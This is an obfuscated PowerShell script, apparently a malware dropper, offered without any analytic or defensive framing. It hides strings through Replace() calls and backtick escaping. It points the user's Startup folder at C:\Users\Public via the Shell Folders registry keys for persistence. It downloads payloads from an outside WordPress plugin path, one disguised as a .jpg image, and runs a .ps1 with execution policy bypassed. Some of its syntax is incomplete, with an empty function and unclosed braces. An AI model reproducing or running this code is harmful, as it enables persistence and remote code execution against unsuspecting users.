$A0="C:kkk.com\Run".Replace("kkk.com","\Users\Public")
$A1 = "CrEP".Replace("EP","eateDirectory")
$BB = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
$CC= "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
$DD = "C:leejonkun".Replace("leejonk","\Users\Public\R")
$EE ="C:kimjongun".Replace("kimjong","\Users\Public\R")
$cv = 'C:\Uscbs'.Replace("c","ers\Public\Run\Run.v")
$cd = 'C:\js1'.Replace("j","Users\Public\ToT.p")
$ee = "C:\jav.com.ps1".Replace("jav.com","Users\Public\ToT")
$JU = 'https://mackcatlabor.com/wp-content/plugins/worker/src/Gelf/vFBofA11ZD8ZTm00.jpg'
[system.io.directory]::$A1($A0)
start-sleep -s 5
Set-ItemProperty -Path $BB -Name "Startup" -Value $DD;
Set-ItemProperty -Path $CC -Name "Startup" -Value $EE;
start-sleep -s 5
Function rr
start-sleep -s 5
if((New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`F`i`l`e"('https://mackcatlabor.com/wp-content/plugins/worker/src/Gelf/HXQ6fLudueVLQw0o.txt',$cv)){
start-sleep -s 5
if((New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`F`i`l`e"($JU, $cd)){
start-sleep -s 3
powershell -windo 1 -noexit -exec bypass -file $ee
IEX rr